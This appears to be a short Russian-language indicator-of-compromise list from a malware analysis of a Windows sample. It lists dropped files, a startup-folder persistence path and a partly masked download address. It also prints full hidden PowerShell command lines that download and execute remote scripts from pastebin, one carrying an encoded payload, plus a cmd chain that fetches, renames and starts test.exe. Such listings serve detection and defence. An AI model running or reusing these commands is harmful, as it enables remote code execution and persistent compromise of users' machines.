Техническая информация
- %TEMP%\test.bin
- %PROGRAMDATA%\microsoft\windows\start menu\programs\startup\test.exe
- %TEMP%\test.bin в %TEMP%\test.exe
- http://15#.#45.120.60/test.bin
- DNS ASK pa###bin.com
- '%TEMP%\test.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('https://pastebin.com/raw/gm28CHzq'))"' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('https://pastebin.com/raw/UT9NCWcm'))"' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASA...
- '<SYSTEM32>\cmd.exe' /c powershell -Command "(New-Object Net.WebClient).DownloadFile('http://15#.#45.120.60/test.bin', 'test.bin')"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -s -NoLogo -NoProfile
- '<SYSTEM32>\cmd.exe' /c rename test.bin test.exe
- '<SYSTEM32>\cmd.exe' /c start test.exe